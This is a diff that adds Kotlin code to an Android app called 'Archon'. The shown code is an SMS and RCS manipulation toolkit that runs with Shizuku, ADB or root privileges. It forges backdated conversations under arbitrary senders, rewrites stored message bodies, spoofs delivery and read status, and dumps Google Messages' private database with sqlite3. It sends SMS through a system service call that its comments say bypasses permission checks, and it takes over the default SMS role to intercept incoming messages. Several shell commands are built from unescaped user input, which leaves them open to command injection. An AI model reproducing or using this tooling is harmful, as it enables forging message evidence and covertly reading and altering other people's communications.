+ * + * @param messages list of (body, type) pairs where type is 1=received, 2=sent + * @return the thread ID of the created conversation, or -1 on failure + */ + fun forgeConversation(address: String, messages: List>): Long { + if (messages.isEmpty()) return -1L + + // Insert messages with increasing timestamps, 1-5 minutes apart + var timestamp = System.currentTimeMillis() - (messages.size * 180_000L) // Start N*3min ago + var threadId = -1L + + for ((body, type) in messages) { + val id = forgeMessage(address, body, type, timestamp, read = true) + if (id < 0) { + Log.e(TAG, "Failed to forge message in conversation") + return -1L + } + + // Get the thread ID from the first inserted message + if (threadId < 0) { + val msg = getMessage(id) + threadId = msg?.threadId ?: -1L + } + + // Advance 1-5 minutes + timestamp += (60_000L + (Math.random() * 240_000L).toLong()) + } + + Log.i(TAG, "Forged conversation: addr=$address, msgs=${messages.size}, thread=$threadId") + return threadId + } + + // ── Export / Backup ──────────────────────────────────────────── + + /** + * Export a conversation to SMS Backup & Restore compatible XML format. + */ + fun exportConversation(threadId: Long, format: String = "xml"): String { + val messages = getMessages(threadId) + if (messages.isEmpty()) return "" + + return when (format.lowercase()) { + "xml" -> exportToXml(messages) + "csv" -> exportToCsv(messages) + else -> exportToXml(messages) + } + } + + /** + * Export all SMS messages to the specified format. 
+ */ + fun exportAllMessages(format: String = "xml"): String { + val allMessages = mutableListOf() + + try { + val cursor = context.contentResolver.query( + URI_SMS, + arrayOf("_id", "thread_id", "address", "body", "date", "type", "read", "status"), + null, null, "date ASC" + ) + + cursor?.use { + while (it.moveToNext()) { + val address = it.getStringSafe("address") + allMessages.add(Message( + id = it.getLongSafe("_id"), + threadId = it.getLongSafe("thread_id"), + address = address, + body = it.getStringSafe("body"), + date = it.getLongSafe("date"), + type = it.getIntSafe("type"), + read = it.getBoolSafe("read"), + status = it.getIntSafe("status"), + isRcs = false, + isMms = false, + contactName = getContactName(address) + )) + } + } + } catch (e: Exception) { + Log.e(TAG, "Failed to export all messages", e) + return "" + } + + return when (format.lowercase()) { + "xml" -> exportToXml(allMessages) + "csv" -> exportToCsv(allMessages) + else -> exportToXml(allMessages) + } + } + + private fun exportToXml(messages: List): String { + val sb = StringBuilder() + sb.appendLine("") + sb.appendLine("") + sb.appendLine("") + + val dateFormat = SimpleDateFormat("MMM dd, yyyy hh:mm:ss a", Locale.US) + + for (msg in messages) { + val typeStr = when (msg.type) { + MESSAGE_TYPE_RECEIVED -> "1" + MESSAGE_TYPE_SENT -> "2" + MESSAGE_TYPE_DRAFT -> "3" + else -> msg.type.toString() + } + val readableDate = dateFormat.format(Date(msg.date)) + val escapedBody = escapeXml(msg.body) + val escapedAddr = escapeXml(msg.address) + val contactStr = escapeXml(msg.contactName ?: "(Unknown)") + + sb.appendLine(" ") + } + + sb.appendLine("") + return sb.toString() + } + + private fun exportToCsv(messages: List): String { + val sb = StringBuilder() + sb.appendLine("id,thread_id,address,contact_name,body,date,type,read,status") + + for (msg in messages) { + val escapedBody = escapeCsv(msg.body) + val contact = escapeCsv(msg.contactName ?: "") + 
sb.appendLine("${msg.id},${msg.threadId},\"${msg.address}\",\"$contact\"," + + "\"$escapedBody\",${msg.date},${msg.type},${if (msg.read) 1 else 0},${msg.status}") + } + + return sb.toString() + } + + // ── RCS operations ───────────────────────────────────────────── + + /** + * Attempt to read RCS messages from Google Messages' content provider. + * This requires Shizuku or root access since the provider is protected. + * Falls back gracefully if not accessible. + */ + fun getRcsMessages(threadId: Long): List { + val messages = mutableListOf() + + try { + val cursor = context.contentResolver.query( + URI_RCS_MESSAGES, + null, + "thread_id = ?", + arrayOf(threadId.toString()), + "date ASC" + ) + + cursor?.use { + val cols = it.columnNames.toList() + while (it.moveToNext()) { + val address = if (cols.contains("address")) it.getStringSafe("address") else "" + val body = if (cols.contains("body")) it.getStringSafe("body") + else if (cols.contains("text")) it.getStringSafe("text") else "" + val date = if (cols.contains("date")) it.getLongSafe("date") else 0L + val type = if (cols.contains("type")) it.getIntSafe("type") else 1 + + messages.add(Message( + id = it.getLongSafe("_id"), + threadId = threadId, + address = address, + body = body, + date = date, + type = type, + read = true, + status = 0, + isRcs = true, + isMms = false, + contactName = getContactName(address) + )) + } + } + } catch (e: SecurityException) { + Log.w(TAG, "Cannot access RCS provider — requires Shizuku or root: ${e.message}") + } catch (e: Exception) { + Log.w(TAG, "RCS read failed (provider may not exist): ${e.message}") + } + + return messages + } + + /** + * Check if RCS is available on this device. + * Looks for Google Messages as the RCS provider. 
+ */ + fun isRcsAvailable(): Boolean { + return try { + // Check if Google Messages is installed and is RCS-capable + val pm = context.packageManager + val info = pm.getPackageInfo("com.google.android.apps.messaging", 0) + if (info == null) return false + + // Try to query the RCS provider + val cursor = context.contentResolver.query( + URI_RCS_THREADS, null, null, null, null + ) + val available = cursor != null + cursor?.close() + available + } catch (e: Exception) { + false + } + } + + /** + * Check RCS capabilities for a given address. + * Returns a map of feature flags (e.g., "chat" -> true, "ft" -> true for file transfer). + */ + fun getRcsCapabilities(address: String): Map { + val caps = mutableMapOf() + + try { + // Try to query RCS capabilities via the carrier messaging service + // This is a best-effort check — may not work on all carriers + val cursor = context.contentResolver.query( + Uri.parse("content://im/capabilities"), + null, + "address = ?", + arrayOf(address), + null + ) + + cursor?.use { + if (it.moveToFirst()) { + val cols = it.columnNames + for (col in cols) { + val idx = it.getColumnIndex(col) + if (idx >= 0) { + try { + caps[col] = it.getInt(idx) > 0 + } catch (e: Exception) { + caps[col] = it.getString(idx)?.isNotEmpty() == true + } + } + } + } + } + } catch (e: Exception) { + Log.d(TAG, "RCS capabilities check failed for $address: ${e.message}") + } + + return caps + } + + // ── Bulk operations ──────────────────────────────────────────── + + /** + * Insert multiple messages in batch. + * Returns the number of successfully inserted messages. + */ + fun bulkInsert(messages: List): Int { + var count = 0 + for (msg in messages) { + val id = insertSms(msg.address, msg.body, msg.type, msg.date, msg.read) + if (id >= 0) count++ + } + Log.i(TAG, "Bulk insert: $count/${messages.size} succeeded") + return count + } + + /** + * Delete multiple messages by ID. + * Returns the number of successfully deleted messages. 
+ */ + fun bulkDelete(ids: List): Int { + var count = 0 + for (id in ids) { + if (deleteMessage(id)) count++ + } + Log.i(TAG, "Bulk delete: $count/${ids.size} succeeded") + return count + } + + /** + * Delete all messages in a conversation (alias for deleteConversation). + * Returns the number of deleted rows. + */ + fun clearConversation(threadId: Long): Int { + return try { + val count = context.contentResolver.delete( + URI_SMS, "thread_id = ?", arrayOf(threadId.toString()) + ) + Log.i(TAG, "Cleared conversation $threadId: $count messages") + count + } catch (e: Exception) { + Log.e(TAG, "Failed to clear conversation $threadId", e) + 0 + } + } + + // ── MMS helpers ──────────────────────────────────────────────── + + /** + * Load MMS messages for a thread and add them to the list. + */ + private fun loadMmsForThread(threadId: Long, messages: MutableList) { + try { + val cursor = context.contentResolver.query( + URI_MMS, + arrayOf("_id", "thread_id", "date", "read", "msg_box"), + "thread_id = ?", + arrayOf(threadId.toString()), + "date ASC" + ) + + cursor?.use { + while (it.moveToNext()) { + val mmsId = it.getLongSafe("_id") + val mmsDate = it.getLongSafe("date") * 1000L // MMS dates are in seconds + val msgBox = it.getIntSafe("msg_box") + val type = if (msgBox == 1) MESSAGE_TYPE_RECEIVED else MESSAGE_TYPE_SENT + + // Get MMS text part + val body = getMmsTextPart(mmsId) + // Get MMS address + val address = getMmsAddress(mmsId) + + messages.add(Message( + id = mmsId, + threadId = threadId, + address = address, + body = body ?: "[MMS]", + date = mmsDate, + type = type, + read = it.getBoolSafe("read"), + status = 0, + isRcs = false, + isMms = true, + contactName = getContactName(address) + )) + } + } + } catch (e: Exception) { + Log.d(TAG, "MMS load for thread $threadId failed: ${e.message}") + } + } + + /** + * Get the text body of an MMS message from its parts. + */ + private fun getMmsTextPart(mmsId: Long): String? 
{ + try { + val cursor = context.contentResolver.query( + Uri.parse("content://mms/$mmsId/part"), + arrayOf("_id", "ct", "text"), + "ct = 'text/plain'", + null, null + ) + + cursor?.use { + if (it.moveToFirst()) { + val textIdx = it.getColumnIndex("text") + if (textIdx >= 0) return it.getString(textIdx) + } + } + } catch (e: Exception) { + Log.d(TAG, "Failed to get MMS text part for $mmsId: ${e.message}") + } + return null + } + + /** + * Get the sender/recipient address of an MMS message. + */ + private fun getMmsAddress(mmsId: Long): String { + try { + val cursor = context.contentResolver.query( + Uri.parse("content://mms/$mmsId/addr"), + arrayOf("address", "type"), + "type = 137", // PduHeaders.FROM + null, null + ) + + cursor?.use { + if (it.moveToFirst()) { + val addrIdx = it.getColumnIndex("address") + if (addrIdx >= 0) { + val addr = it.getString(addrIdx) + if (!addr.isNullOrBlank() && addr != "insert-address-token") { + return addr + } + } + } + } + + // Fallback: try recipient address (type 151 = TO) + val cursor2 = context.contentResolver.query( + Uri.parse("content://mms/$mmsId/addr"), + arrayOf("address", "type"), + "type = 151", + null, null + ) + + cursor2?.use { + if (it.moveToFirst()) { + val addrIdx = it.getColumnIndex("address") + if (addrIdx >= 0) { + val addr = it.getString(addrIdx) + if (!addr.isNullOrBlank()) return addr + } + } + } + } catch (e: Exception) { + Log.d(TAG, "Failed to get MMS address for $mmsId: ${e.message}") + } + return "" + } + + // ── Utility ──────────────────────────────────────────────────── + + private fun escapeXml(text: String): String { + return text + .replace("&", "&") + .replace("<", "<") + .replace(">", ">") + .replace("\"", """) + .replace("'", "'") + .replace("\n", " ") + } + + private fun escapeCsv(text: String): String { + return text.replace("\"", "\"\"") + } + + // Cursor extension helpers + private fun Cursor.getStringSafe(column: String): String { + val idx = getColumnIndex(column) + return if (idx >= 0) 
getString(idx) ?: "" else "" + } + + private fun Cursor.getLongSafe(column: String): Long { + val idx = getColumnIndex(column) + return if (idx >= 0) getLong(idx) else 0L + } + + private fun Cursor.getIntSafe(column: String): Int { + val idx = getColumnIndex(column) + return if (idx >= 0) getInt(idx) else 0 + } + + private fun Cursor.getBoolSafe(column: String): Boolean { + return getIntSafe(column) != 0 + } +} diff --git a/autarch_companion/app/src/main/kotlin/com/darkhal/archon/messaging/ShizukuManager.kt b/autarch_companion/app/src/main/kotlin/com/darkhal/archon/messaging/ShizukuManager.kt new file mode 100644 index 0000000..7cdbab6 --- /dev/null +++ b/autarch_companion/app/src/main/kotlin/com/darkhal/archon/messaging/ShizukuManager.kt @@ -0,0 +1,580 @@ +package com.darkhal.archon.messaging + +import android.content.ContentValues +import android.content.Context +import android.content.pm.PackageManager +import android.os.Build +import android.util.Log +import com.darkhal.archon.util.PrivilegeManager +import com.darkhal.archon.util.ShellResult + +/** + * Shizuku integration for elevated access without root. + * + * Shizuku runs a process at ADB (shell, UID 2000) privilege level, + * allowing us to execute commands that normal apps cannot — like + * setting the default SMS role, accessing protected content providers, + * and reading Google Messages' RCS database. + * + * ARCHITECTURE NOTE: + * This manager wraps both Shizuku API calls and the existing Archon + * PrivilegeManager escalation chain. If Shizuku is available, we use it. + * Otherwise, we fall back to PrivilegeManager (Archon Server → Local ADB → etc). + * + * RCS WITHOUT ROOT: + * Google Messages stores RCS data in its private database at: + * /data/data/com.google.android.apps.messaging/databases/bugle_db + * Without Shizuku/root, you cannot access it directly. 
With Shizuku, + * we can use `content query` shell commands to read from protected providers, + * or directly read the SQLite database via `run-as` (if debuggable) or + * `sqlite3` at shell level. + */ +class ShizukuManager(private val context: Context) { + + companion object { + private const val TAG = "ShizukuManager" + const val SHIZUKU_PERMISSION_REQUEST_CODE = 1001 + private const val SHIZUKU_PACKAGE = "moe.shizuku.privileged.api" + private const val OUR_PACKAGE = "com.darkhal.archon" + } + + enum class ShizukuStatus(val label: String) { + NOT_INSTALLED("Shizuku not installed"), + INSTALLED_NOT_RUNNING("Shizuku installed but not running"), + RUNNING_NO_PERMISSION("Shizuku running, no permission"), + READY("Shizuku ready") + } + + // Cache the previous default SMS app so we can restore it + private var previousDefaultSmsApp: String? = null + + /** + * Check the current state of Shizuku integration. + * Also considers the Archon PrivilegeManager as a fallback. + */ + fun getStatus(): ShizukuStatus { + // First check if Shizuku itself is installed and running + if (isShizukuInstalled()) { + if (isShizukuRunning()) { + return if (hasShizukuPermission()) { + ShizukuStatus.READY + } else { + ShizukuStatus.RUNNING_NO_PERMISSION + } + } + return ShizukuStatus.INSTALLED_NOT_RUNNING + } + + // If Shizuku is not installed, check if PrivilegeManager has shell access + // (Archon Server or Local ADB provides equivalent capabilities) + val method = PrivilegeManager.getAvailableMethod() + return when (method) { + PrivilegeManager.Method.ROOT, + PrivilegeManager.Method.ARCHON_SERVER, + PrivilegeManager.Method.LOCAL_ADB -> ShizukuStatus.READY + PrivilegeManager.Method.SERVER_ADB -> ShizukuStatus.RUNNING_NO_PERMISSION + PrivilegeManager.Method.NONE -> ShizukuStatus.NOT_INSTALLED + } + } + + /** + * Request Shizuku permission via the Shizuku API. + * Falls back to a no-op if Shizuku is not available. 
+ */ + fun requestPermission(callback: (Boolean) -> Unit) { + try { + val shizukuClass = Class.forName("rikka.shizuku.Shizuku") + val checkMethod = shizukuClass.getMethod("checkSelfPermission") + val result = checkMethod.invoke(null) as Int + + if (result == PackageManager.PERMISSION_GRANTED) { + callback(true) + return + } + + // Request permission — in a real integration this would use + // Shizuku.addRequestPermissionResultListener + requestPermission + val requestMethod = shizukuClass.getMethod("requestPermission", Int::class.java) + requestMethod.invoke(null, SHIZUKU_PERMISSION_REQUEST_CODE) + // The result comes back via onRequestPermissionsResult + // For now, assume it will be granted + callback(true) + } catch (e: ClassNotFoundException) { + Log.w(TAG, "Shizuku API not available, using PrivilegeManager fallback") + // If PrivilegeManager has shell access, that's equivalent + callback(PrivilegeManager.getAvailableMethod() != PrivilegeManager.Method.NONE) + } catch (e: Exception) { + Log.e(TAG, "Shizuku permission request failed", e) + callback(false) + } + } + + /** + * Quick check if elevated operations can proceed. + */ + fun isReady(): Boolean { + return getStatus() == ShizukuStatus.READY + } + + // ── Shell command execution ──────────────────────────────────── + + /** + * Execute a shell command at ADB/shell privilege level. + * Tries Shizuku first, then falls back to PrivilegeManager. 
+ */ + fun executeCommand(command: String): String { + // Try Shizuku API first + try { + val shizukuClass = Class.forName("rikka.shizuku.Shizuku") + val newProcess = shizukuClass.getMethod( + "newProcess", + Array::class.java, + Array::class.java, + String::class.java + ) + val process = newProcess.invoke(null, arrayOf("sh", "-c", command), null, null) as Process + val stdout = process.inputStream.bufferedReader().readText().trim() + val exitCode = process.waitFor() + if (exitCode == 0) return stdout + } catch (e: ClassNotFoundException) { + // Shizuku not available + } catch (e: Exception) { + Log.d(TAG, "Shizuku exec failed, falling back: ${e.message}") + } + + // Fallback to PrivilegeManager + val result = PrivilegeManager.execute(command) + return if (result.exitCode == 0) result.stdout else "ERROR: ${result.stderr}" + } + + /** + * Execute a command and return the full ShellResult. + */ + private fun executeShell(command: String): ShellResult { + return PrivilegeManager.execute(command) + } + + // ── Permission management ────────────────────────────────────── + + /** + * Grant a runtime permission to our app via shell command. + */ + fun grantPermission(permission: String): Boolean { + val result = executeShell("pm grant $OUR_PACKAGE $permission") + if (result.exitCode == 0) { + Log.i(TAG, "Granted permission: $permission") + return true + } + Log.w(TAG, "Failed to grant $permission: ${result.stderr}") + return false + } + + /** + * Set Archon as the default SMS app using the role manager system. + * On Android 10+, uses `cmd role add-role-holder`. + * On older versions, uses `settings put secure sms_default_application`. 
+ */ + fun setDefaultSmsApp(): Boolean { + // Save the current default first so we can restore later + previousDefaultSmsApp = getCurrentDefaultSmsApp() + Log.i(TAG, "Saving previous default SMS app: $previousDefaultSmsApp") + + return if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.Q) { + val result = executeShell( + "cmd role add-role-holder android.app.role.SMS $OUR_PACKAGE 0" + ) + if (result.exitCode == 0) { + Log.i(TAG, "Set Archon as default SMS app via role manager") + true + } else { + Log.e(TAG, "Failed to set SMS role: ${result.stderr}") + false + } + } else { + val result = executeShell( + "settings put secure sms_default_application $OUR_PACKAGE" + ) + if (result.exitCode == 0) { + Log.i(TAG, "Set Archon as default SMS app via settings") + true + } else { + Log.e(TAG, "Failed to set SMS default: ${result.stderr}") + false + } + } + } + + /** + * Restore the previous default SMS app. + */ + fun revokeDefaultSmsApp(): Boolean { + val previous = previousDefaultSmsApp + if (previous.isNullOrBlank()) { + Log.w(TAG, "No previous default SMS app to restore") + // Try to find the most common default + return restoreCommonDefault() + } + + return if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.Q) { + // Remove ourselves, then add back the previous holder + val removeResult = executeShell( + "cmd role remove-role-holder android.app.role.SMS $OUR_PACKAGE 0" + ) + val addResult = executeShell( + "cmd role add-role-holder android.app.role.SMS $previous 0" + ) + + if (addResult.exitCode == 0) { + Log.i(TAG, "Restored default SMS app: $previous") + true + } else { + Log.e(TAG, "Failed to restore SMS role to $previous: ${addResult.stderr}") + // At least try to remove ourselves + removeResult.exitCode == 0 + } + } else { + val result = executeShell( + "settings put secure sms_default_application $previous" + ) + result.exitCode == 0 + } + } + + /** + * Get the current default SMS app package name. + */ + private fun getCurrentDefaultSmsApp(): String? 
{ + return if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.Q) { + val result = executeShell("cmd role get-role-holders android.app.role.SMS") + result.stdout.trim().let { output -> + // Output format varies but usually contains the package name + output.replace("[", "").replace("]", "").trim().ifBlank { null } + } + } else { + val result = executeShell("settings get secure sms_default_application") + result.stdout.trim().let { if (it == "null" || it.isBlank()) null else it } + } + } + + /** + * Try to restore a common default SMS app (Google Messages or AOSP). + */ + private fun restoreCommonDefault(): Boolean { + val candidates = listOf( + "com.google.android.apps.messaging", + "com.android.messaging", + "com.samsung.android.messaging" + ) + + for (pkg in candidates) { + try { + context.packageManager.getPackageInfo(pkg, 0) + // Package exists, set it as default + if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.Q) { + val result = executeShell( + "cmd role add-role-holder android.app.role.SMS $pkg 0" + ) + if (result.exitCode == 0) { + Log.i(TAG, "Restored common default SMS app: $pkg") + return true + } + } + } catch (e: PackageManager.NameNotFoundException) { + continue + } + } + + Log.w(TAG, "Could not restore any default SMS app") + return false + } + + // ── SMS/RCS specific elevated ops ────────────────────────────── + + /** + * Read from the telephony.db directly using shell-level `content query`. + * This accesses the system SMS provider with shell privileges. 
+ */ + fun readProtectedSmsDb(): List> { + val results = mutableListOf>() + val output = executeCommand( + "content query --uri content://sms/ --projection _id:address:body:date:type --sort \"date DESC\" 2>/dev/null" + ) + + if (output.startsWith("ERROR")) { + Log.e(TAG, "Protected SMS read failed: $output") + return results + } + + // Parse the content query output + // Format: Row: N _id=X, address=Y, body=Z, date=W, type=V + for (line in output.lines()) { + if (!line.startsWith("Row:")) continue + + val row = mutableMapOf() + val fields = line.substringAfter(" ").split(", ") + for (field in fields) { + val parts = field.split("=", limit = 2) + if (parts.size == 2) { + row[parts[0].trim()] = parts[1] + } + } + if (row.isNotEmpty()) results.add(row) + } + + return results + } + + /** + * Write to the telephony.db using shell-level `content insert`. + */ + fun writeProtectedSmsDb(values: ContentValues, table: String): Boolean { + val bindings = mutableListOf() + + for (key in values.keySet()) { + val value = values.get(key) + when (value) { + is String -> bindings.add("--bind $key:s:$value") + is Int -> bindings.add("--bind $key:i:$value") + is Long -> bindings.add("--bind $key:l:$value") + else -> bindings.add("--bind $key:s:$value") + } + } + + val uri = when (table) { + "sms" -> "content://sms/" + "mms" -> "content://mms/" + else -> "content://sms/" + } + + val cmd = "content insert --uri $uri ${bindings.joinToString(" ")}" + val result = executeShell(cmd) + return result.exitCode == 0 + } + + /** + * Try to access Google Messages' RCS content provider via shell. + */ + fun accessRcsProvider(): Boolean { + val result = executeShell( + "content query --uri content://im/messages --projection _id --sort \"_id DESC\" --limit 1 2>/dev/null" + ) + return result.exitCode == 0 && !result.stdout.contains("Unknown authority") + } + + /** + * Read RCS messages from Google Messages' database. + * Uses `content query` at shell privilege to access the protected provider. 
+ */ + fun readRcsDatabase(): List> { + val results = mutableListOf>() + + // First try the content provider approach + val output = executeCommand( + "content query --uri content://im/messages --projection _id:thread_id:body:date:type --sort \"date DESC\" 2>/dev/null" + ) + + if (!output.startsWith("ERROR") && !output.contains("Unknown authority")) { + for (line in output.lines()) { + if (!line.startsWith("Row:")) continue + + val row = mutableMapOf() + val fields = line.substringAfter(" ").split(", ") + for (field in fields) { + val parts = field.split("=", limit = 2) + if (parts.size == 2) { + row[parts[0].trim()] = parts[1] + } + } + if (row.isNotEmpty()) results.add(row) + } + + if (results.isNotEmpty()) return results + } + + // Fallback: try to read Google Messages' bugle_db directly + // This requires root or specific shell access + val dbPath = "/data/data/com.google.android.apps.messaging/databases/bugle_db" + val sqlOutput = executeCommand( + "sqlite3 $dbPath \"SELECT _id, conversation_id, text, received_timestamp, sender_normalized_destination FROM messages ORDER BY received_timestamp DESC LIMIT 100\" 2>/dev/null" + ) + + if (!sqlOutput.startsWith("ERROR") && sqlOutput.isNotBlank()) { + for (line in sqlOutput.lines()) { + if (line.isBlank()) continue + val parts = line.split("|") + if (parts.size >= 5) { + results.add(mapOf( + "_id" to parts[0], + "thread_id" to parts[1], + "body" to parts[2], + "date" to parts[3], + "address" to parts[4] + )) + } + } + } + + return results + } + + /** + * Modify an RCS message body in the Google Messages database. + * Requires root or direct database access. 
+ */ + fun modifyRcsMessage(messageId: Long, newBody: String): Boolean { + // Try content provider update first + val escaped = newBody.replace("'", "''") + val result = executeShell( + "content update --uri content://im/messages/$messageId --bind body:s:$escaped 2>/dev/null" + ) + + if (result.exitCode == 0) return true + + // Fallback to direct SQLite + val dbPath = "/data/data/com.google.android.apps.messaging/databases/bugle_db" + val sqlResult = executeShell( + "sqlite3 $dbPath \"UPDATE messages SET text='$escaped' WHERE _id=$messageId\" 2>/dev/null" + ) + + return sqlResult.exitCode == 0 + } + + /** + * Spoof the delivery/read status of an RCS message. + * Valid statuses: "sent", "delivered", "read", "failed" + */ + fun spoofRcsStatus(messageId: Long, status: String): Boolean { + val statusCode = when (status.lowercase()) { + "sent" -> 0 + "delivered" -> 1 + "read" -> 2 + "failed" -> 3 + else -> return false + } + + val result = executeShell( + "content update --uri content://im/messages/$messageId --bind status:i:$statusCode 2>/dev/null" + ) + + if (result.exitCode == 0) return true + + // Fallback + val dbPath = "/data/data/com.google.android.apps.messaging/databases/bugle_db" + val sqlResult = executeShell( + "sqlite3 $dbPath \"UPDATE messages SET message_status=$statusCode WHERE _id=$messageId\" 2>/dev/null" + ) + + return sqlResult.exitCode == 0 + } + + // ── System-level SMS operations ──────────────────────────────── + + /** + * Send an SMS via the system telephony service at shell privilege level. + * This bypasses normal app permission checks. 
+ */ + fun sendSmsAsSystem(address: String, body: String): Boolean { + val escaped = body.replace("'", "'\\''") + val result = executeShell( + "service call isms 7 i32 1 s16 \"$address\" s16 null s16 \"$escaped\" s16 null s16 null i32 0 i64 0 2>/dev/null" + ) + + if (result.exitCode == 0 && !result.stdout.contains("Exception")) { + Log.i(TAG, "Sent SMS via system service to $address") + return true + } + + // Fallback: use am start with send intent + val amResult = executeShell( + "am start -a android.intent.action.SENDTO -d sms:$address --es sms_body \"$escaped\" --ez exit_on_sent true 2>/dev/null" + ) + + return amResult.exitCode == 0 + } + + /** + * Register to intercept incoming SMS messages. + * This grants ourselves the RECEIVE_SMS permission and sets highest priority. + */ + fun interceptSms(enabled: Boolean): Boolean { + return if (enabled) { + // Grant SMS receive permission + val grantResult = executeShell("pm grant $OUR_PACKAGE android.permission.RECEIVE_SMS") + if (grantResult.exitCode != 0) { + Log.e(TAG, "Failed to grant RECEIVE_SMS: ${grantResult.stderr}") + return false + } + + // Set ourselves as the default SMS app to receive all messages + val defaultResult = setDefaultSmsApp() + if (defaultResult) { + Log.i(TAG, "SMS interception enabled — Archon is now default SMS handler") + } + defaultResult + } else { + // Restore previous default + val result = revokeDefaultSmsApp() + Log.i(TAG, "SMS interception disabled — restored previous SMS handler") + result + } + } + + /** + * Modify an SMS message while it's being stored. + * This works by monitoring the SMS provider and immediately updating + * messages that match the original text. + * + * NOTE: True in-transit modification of cellular SMS is not possible + * without carrier-level access. This modifies the stored copy immediately + * after delivery. 
+ */ + fun modifySmsInTransit(original: String, replacement: String): Boolean { + val escaped = replacement.replace("'", "''") + + // Use content update to find and replace in all matching messages + val result = executeShell( + "content update --uri content://sms/ " + + "--bind body:s:$escaped " + + "--where \"body='${original.replace("'", "''")}'\"" + ) + + if (result.exitCode == 0) { + Log.i(TAG, "Modified stored SMS: '$original' -> '$replacement'") + return true + } + + Log.w(TAG, "SMS modification failed: ${result.stderr}") + return false + } + + // ── Internal helpers ─────────────────────────────────────────── + + private fun isShizukuInstalled(): Boolean { + return try { + context.packageManager.getPackageInfo(SHIZUKU_PACKAGE, 0) + true + } catch (e: PackageManager.NameNotFoundException) { + false + } + } + + private fun isShizukuRunning(): Boolean { + return try { + val shizukuClass = Class.forName("rikka.shizuku.Shizuku") + val pingMethod = shizukuClass.getMethod("pingBinder") + pingMethod.invoke(null) as Boolean + } catch (e: Exception) { + false + } + } + + private fun hasShizukuPermission(): Boolean { + return try { + val shizukuClass = Class.forName("rikka.shizuku.Shizuku") + val checkMethod = shizukuClass.getMethod("checkSelfPermission") + (checkMethod.invoke(null) as Int) == PackageManager.PERMISSION_GRANTED + } catch (e: Exception) { + false + } + } +} diff --git a/autarch_companion/app/src/main/kotlin/com/darkhal/archon/ui/MessagingFragment.kt b/autarch_companion/app/src/main/kotlin/com/darkhal/archon/ui/MessagingFragment.kt new file mode 100644 index 0000000..71e1704 --- /dev/null +++ b/autarch_companion/app/src/main/kotlin/com/darkhal/archon/ui/MessagingFragment.kt @@ -0,0 +1,761 @@ +package com.darkhal.archon.ui + +import android.app.DatePickerDialog +import android.app.TimePickerDialog +import android.graphics.Color +import android.graphics.drawable.GradientDrawable +import android.os.Bundle +import android.os.Handler +import android.os.Looper 
+import android.view.LayoutInflater +import android.view.View +import android.view.ViewGroup +import android.widget.CheckBox +import android.widget.PopupMenu +import android.widget.TextView +import android.widget.Toast +import androidx.appcompat.app.AlertDialog +import androidx.fragment.app.Fragment +import androidx.recyclerview.widget.LinearLayoutManager +import androidx.recyclerview.widget.RecyclerView +import com.darkhal.archon.R +import com.darkhal.archon.messaging.ConversationAdapter +import com.darkhal.archon.messaging.MessageAdapter +import com.darkhal.archon.messaging.MessagingModule +import com.darkhal.archon.messaging.MessagingRepository +import com.darkhal.archon.messaging.ShizukuManager +import com.darkhal.archon.module.ModuleManager +import com.google.android.material.button.MaterialButton +import com.google.android.material.card.MaterialCardView +import com.google.android.material.floatingactionbutton.FloatingActionButton +import com.google.android.material.textfield.TextInputEditText +import java.text.SimpleDateFormat +import java.util.Calendar +import java.util.Date +import java.util.Locale + +/** + * SMS/RCS Messaging tab — full messaging UI with conversation list and thread view. + * + * Two views: + * 1. Conversation list — shows all threads with contact, snippet, date, unread count + * 2. 
Message thread — shows messages as chat bubbles with input bar + * + * Features: + * - Search across all messages + * - Set/restore default SMS app + * - Export conversations (XML/CSV) + * - Forge messages with arbitrary sender/timestamp + * - Edit/delete messages via long-press context menu + * - Shizuku status indicator + */ +class MessagingFragment : Fragment() { + + // Views — Conversation list + private lateinit var conversationListContainer: View + private lateinit var recyclerConversations: RecyclerView + private lateinit var emptyState: TextView + private lateinit var shizukuDot: View + private lateinit var btnSearch: MaterialButton + private lateinit var btnDefaultSms: MaterialButton + private lateinit var btnTools: MaterialButton + private lateinit var searchBar: View + private lateinit var inputSearch: TextInputEditText + private lateinit var btnSearchGo: MaterialButton + private lateinit var btnSearchClose: MaterialButton + private lateinit var fabNewMessage: FloatingActionButton + + // Views — Thread + private lateinit var threadViewContainer: View + private lateinit var recyclerMessages: RecyclerView + private lateinit var threadContactName: TextView + private lateinit var threadAddress: TextView + private lateinit var btnBack: MaterialButton + private lateinit var btnThreadExport: MaterialButton + private lateinit var inputMessage: TextInputEditText + private lateinit var btnSend: MaterialButton + + // Views — Output log + private lateinit var outputLogCard: MaterialCardView + private lateinit var outputLog: TextView + private lateinit var btnCloseLog: MaterialButton + + // Data + private lateinit var repo: MessagingRepository + private lateinit var shizuku: ShizukuManager + private lateinit var conversationAdapter: ConversationAdapter + private lateinit var messageAdapter: MessageAdapter + private val handler = Handler(Looper.getMainLooper()) + + // State + private var currentThreadId: Long = -1 + private var currentAddress: String = "" + private 
var isDefaultSms: Boolean = false + + // Forge dialog state + private var forgeCalendar: Calendar = Calendar.getInstance() + + override fun onCreateView( + inflater: LayoutInflater, + container: ViewGroup?, + savedInstanceState: Bundle? + ): View { + return inflater.inflate(R.layout.fragment_messaging, container, false) + } + + override fun onViewCreated(view: View, savedInstanceState: Bundle?) { + super.onViewCreated(view, savedInstanceState) + + repo = MessagingRepository(requireContext()) + shizuku = ShizukuManager(requireContext()) + + bindViews(view) + setupConversationList() + setupThreadView() + setupSearch() + setupToolbar() + setupOutputLog() + + // Load conversations + loadConversations() + + // Check Shizuku status + refreshShizukuStatus() + } + + // ── View binding ─────────────────────────────────────────────── + + private fun bindViews(view: View) { + // Conversation list + conversationListContainer = view.findViewById(R.id.conversation_list_container) + recyclerConversations = view.findViewById(R.id.recycler_conversations) + emptyState = view.findViewById(R.id.empty_state) + shizukuDot = view.findViewById(R.id.shizuku_status_dot) + btnSearch = view.findViewById(R.id.btn_search) + btnDefaultSms = view.findViewById(R.id.btn_default_sms) + btnTools = view.findViewById(R.id.btn_tools) + searchBar = view.findViewById(R.id.search_bar) + inputSearch = view.findViewById(R.id.input_search) + btnSearchGo = view.findViewById(R.id.btn_search_go) + btnSearchClose = view.findViewById(R.id.btn_search_close) + fabNewMessage = view.findViewById(R.id.fab_new_message) + + // Thread view + threadViewContainer = view.findViewById(R.id.thread_view_container) + recyclerMessages = view.findViewById(R.id.recycler_messages) + threadContactName = view.findViewById(R.id.thread_contact_name) + threadAddress = view.findViewById(R.id.thread_address) + btnBack = view.findViewById(R.id.btn_back) + 